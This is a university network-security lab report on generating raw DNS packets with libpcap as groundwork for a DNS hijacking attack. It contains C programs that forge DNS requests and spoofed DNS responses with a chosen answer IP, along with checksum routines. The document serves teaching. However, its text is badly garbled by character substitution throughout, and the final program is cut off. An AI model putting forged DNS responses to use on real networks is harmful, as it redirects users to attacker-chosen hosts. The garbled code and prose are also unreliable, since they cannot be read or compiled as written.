NetworkSecurity MITM05016 DoNhuTai Lab2
Content
INTERNATIONAL UNIVERSITY School of Computer Science and Engineering LAB 2: DNS attack (Part 1 + 2) Course !ate Network Security Lecturer Pham Van Hau,PhD
24/09/2013
Duration: 180 minutes
Student name '( N)* T+I
Student I! "IT"#$#%&
Introduction
To do the DNS Hijacking attack, you need to know how to generate, capture the packets programmatically. Understand the udp, dns packet headers as well as the dns protocol The purpose of this lab is to gi e you hands!on e"perience on low le el network programming. #ore precisely, you are going to create the dns re$uest and response. These will help you a lot for the ne"t lab %&. 'n general, to generate the raw packet you can use pcap library (http%))www.tcpdump.org)pcap.html&. *ibnet library http%))packetfactory.openwall.net)projects)libnet)dist)deprecated)manual)lrm.html or e en the standard +,' http%))en.wikipedia.org)wiki)-erkeley.sockets 'n the conte"t of this lab, we use pcap library for our purpose. Se eral useful information can be found at http%))www.tcpdump.org)pcap.html To help you to ha e an idea how the dns packet look like, on your linux machine • open wireshark to capture the traffic • open a terminal and e"ecute /nslookup ne"press.net0 Try to look at the different fields of the captured dns!packet and understand what they are used for. This link http%))www.networksorcery.com)enp)protocol)dns.htm is also a great source for this purpose.
Part I: DNS packet generation
To help you on the programming stuff, ' ha e created two programs, called dns_request_gen.c and dns_response_gen.c. The programs ' sent to you are not complete. 1ou need to modify them at se eral places ( ' ha e marked as /T2 -3 #2D'4'3D0&. I. DNS packet request #odify dns_request_gen.c to generate the dns re$uest that ha e the • source #+5% +6 +7 +8 +9 +: +; • destination #+5% -6 -7 -8 -9 -: -; • source port% 9<<< • destination port% :8 • Transaction 'D% ++-• source ', address%6.7.8.9 • destination ', address% ;.=.>.? • dns $uerry to ask the ', address of / ne"press.net0
Answer% Dntai_dns_request_v1.c (without ip, udp checksum )
#include <string.h> //strlen #include <stdlib.h> //malloc #include <sys/socket.h> //you know what this is for #include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc #include <netinet/in.h> #include <unistd.h> //getpid #include <pcap.h> /* Ethernet headers are always e actly !" bytes */ #define #$%E_E&' !" /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_3uery { u_short 3_type; u_short 3_class; }; /* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ }; /* functions */ 5oid print_app_info(5oid){ printf(B+ns re3uest 5ersion ! writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns); 5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9;
int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; // Ehen get to the last character // #tore the final counter into the dns name buffer
}
int main(int argc,char {
arg5[])
char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; // host name to look up ip. E I 5ne press.net char de5; // network de5ice to capture. E I eth9 u_char packet[J999]; // packet is buffer to contain data print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet =LEthernetM N L$/M N L&1//.+/M N L*pplicationM> memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc /* ????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; // // // // pointer pointer pointer pointer chi chi chi chi toi toi toi toi 5ung 5ung 5ung 5ung dau dau dau dau cua cua cua cua ethernet header ip header udp header dns header
u_char 3_name; int host_len!strlen(host); =5ne press.net co lenQ!H> struct dns_3uery dns_3r; int siFe_3_name!host_len"7;
// pointer chi toi 5ung dau chua 3uery_name // do dai cua 3uery name chinh la so ky tu cua host name // pointer chi toi 5ung dau cua dns 3uery // kich thuoc cua 3uery name 5a dns 3uery header =7>
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header ) (packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery -ame /ointerR 3_name !(u_char )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointerR dns_3r !(struct dns_3uery )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); /* Ethernet 'eader */ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_dhost, (); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99> /* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9;
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B!.7.H."B); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B(.2.:.OB); // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons("999); /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons(JH); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 9!99); dns&$3_count!htons(9 99!); dns&$ans_count!9; dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns re$uest packets
A 3thernet Header
A ', Header (with checksum error&
A UD, Header
A Dns Buery
II. DNS packet response #odify dns_response_gen.c to generate the dns response that ha e the • source #+5% -6 -7 -8 -9 -: -; • destination #+5% +6 +7 +8 +9 +: +; • source port% :8 • destination port% 9<<<
• Transaction 'D% ++-• source ', address%;.=.>.? • destination ', address% 6.7.8.9 • dns response% the ip address of / ne"press.net0 is /666.;:.79>.6870 Answer% Dntai_dns_response_v1.c (without ip, udp checksum )
#include <string.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> #include <pcap.h> /* Ethernet headers are #define #$%E_E&' !" //strlen //malloc //you know what this is for //inet_addr , inet_ntoa , ntohs etc //getpid always e actly !" bytes */
/* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_answer { u_short a_name; u_short a_type; u_short a_class; u_char a_ttl["]; u_short a_len; struct in_addr a_addr; }; struct dns_3uery { u_short 3_type; u_short 3_class; }; /* /* /* /* /* answer host name */ answer host type */ answer host class */ time to li5e cost " bytes */ length */ /* address of host */
/* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; struct dns_header { u_short id; u_short flags; u_short 3_count; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
/* transaction $+ */ /* flags */ /* number of 3uestion entries */
};
u_short ans_count; u_short auth_count; u_short add_count;
/* number of answer entries */ /* number of authority entries */ /* number of resource entries */
/* functions */ 5oid print_app_info(5oid) { printf(B+ns response 5ersion ! writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns);
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; } int main(int argc,char arg5[]) { u_char packet[J999]; char de5; // network de5ice char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet memset(packet,9,"9O(); /* // Ehen get to the last character // #tore the final counter into the dns name buffer
????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; dns_3uery dns_3r; dns_as; // // // // // pointer pointer pointer pointer pointer chi chi chi chi chi toi toi toi toi toi 5ung 5ung 5ung 5ung 5ung dau dau dau dau dau cua cua cua cua cua ethernet header ip header udp header dns header dns 3uery
u_char 3_name; struct dns_answer
// +ns name in 3uery // pointer chi toi 5ung dau cua dns answer // 'ostname length // kich thuoc cua 3uery name 5a dns 3uery header =7>
int host_len!strlen(host); int siFe_3_name!host_len"7;
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header )(packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery name /ointer 3_name !(u_char ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointer dns_3r !(struct dns_3uery ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); // +ns *nswer /ointer dns_as!(struct dns_answer ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); /* Ethernet 'eader */ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_dhost,(); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99> /* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9; // $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons("999); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 :!:9); dns&$3_count!htons(9 99!); dns&$ans_count!htons(9 99!); dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* +-# *nswer */ bcopy(BC c9C 9cB,(dns_as&$a_name,7);
dns_as&$a_type!htons(!); dns_as&$a_class!htons(!); bcopy(BC 99C 99C 9!C cHB,(dns_as&$a_ttl,"); dns_as&$a_len!htons(");
// type of the host // class
/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B); /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } return 9; }
@esult with capturing packet% A @ecei e ; dns response packets
III.DNS packet response The checksum (of ip and udp headers) of the generated packets are wrong. Do the necessary to make them right. Answer% Dntai_dns_request_v..c (with ip, udp checksum )
#include <string.h> #include <stdlib.h> //strlen //malloc
#include <sys/socket.h> //you know what this is for #include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc #include <netinet/in.h> #include <unistd.h> //getpid #include <pcap.h> /* Ethernet headers are always e actly !" bytes */ #define #$%E_E&' !" /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_3uery { u_short 3_type; u_short 3_class; }; /* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ };
/* functions */ 5oid print_app_info(5oid){ printf(B+ns re3uest 5ersion 7 writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns);
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9;
// 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; // Ehen get to the last character // #tore the final counter into the dns name buffer
}
/* ???????????? 8.-1&$0- 1)E*&E 1'E1<#.; 08 .+/, $/ ???????????????? */ unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; %or (i!9; i-(nwords/7); i"") sum "! buf[i]; buf, int nwords)
sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); } return 0sum;
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); } return 0sum; arg5[])
int main(int argc,char {
char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; // host name to look up ip. E I 5ne press.net char de5; // network de5ice to capture. E I eth9 u_char packet[J999]; // packet is buffer to contain data print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet =LEthernetM N L$/M N L&1//.+/M N L*pplicationM> memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc /* ????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; // // // // pointer pointer pointer pointer chi chi chi chi toi toi toi toi 5ung 5ung 5ung 5ung dau dau dau dau cua cua cua cua ethernet header ip header udp header dns header
u_char 3_name; int host_len!strlen(host); =5ne press.net co lenQ!H> struct dns_3uery dns_3r; int siFe_3_name!host_len"7;
// pointer chi toi 5ung dau chua 3uery_name // do dai cua 3uery name chinh la so ky tu cua host name // pointer chi toi 5ung dau cua dns 3uery // kich thuoc cua 3uery name 5a dns 3uery header =7>
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header ) (packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery -ame /ointerR 3_name !(u_char )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointerR dns_3r !(struct dns_3uery )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); /* Ethernet 'eader */ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_dhost, (); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99>
/* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9;
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B!.7.H."B); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B(.2.:.OB); // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons("999); /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons(JH); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 9!99); dns&$3_count!htons(9 99!); dns&$ans_count!9; dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* ./+*&E 1'E1<#.; 08 $/ 'E*+E) *-+ .+/ 'E*+E) */ ip&$ip_sum!9; ip&$ip_sum! (csum ((unsigned short ) (packet"#$%E_E&') ,siFe_ip)); udp&$udp_sum!9; udp&$udp_sum! htons(udp_csum(ntohs(udp&$udp_len), (u_short )((ip&$ip_src) , (u_short )((ip& $ip_dst), (unsigned short )udp)); /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns re$uest packets
Answer% Dntai_dns_response_v..c (with ip, udp checksum )
#include <string.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> #include <pcap.h> /* Ethernet headers are #define #$%E_E&' !" //strlen //malloc //you know what this is for //inet_addr , inet_ntoa , ntohs etc //getpid always e actly !" bytes */
/* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_answer { u_short a_name; u_short a_type; u_short a_class; u_char a_ttl["]; u_short a_len; struct in_addr a_addr; }; struct dns_3uery { u_short 3_type; u_short 3_class; }; /* /* /* /* /* answer host name */ answer host type */ answer host class */ time to li5e cost " bytes */ length */ /* address of host */
/* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl;
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */
};
u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst;
/* protocol */ /* checksum */
#define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ };
/* functions */ 5oid print_app_info(5oid) { printf(B+ns response 5ersion 7 writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns);
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; } /* ???????????? 8.-1&$0- 1)E*&E 1'E1<#.; 08 .+/, $/ ???????????????? */ unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; %or (i!9; i-(nwords/7); i"") sum "! buf[i]; buf, int nwords) // Ehen get to the last character // #tore the final counter into the dns name buffer
sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); return 0sum;
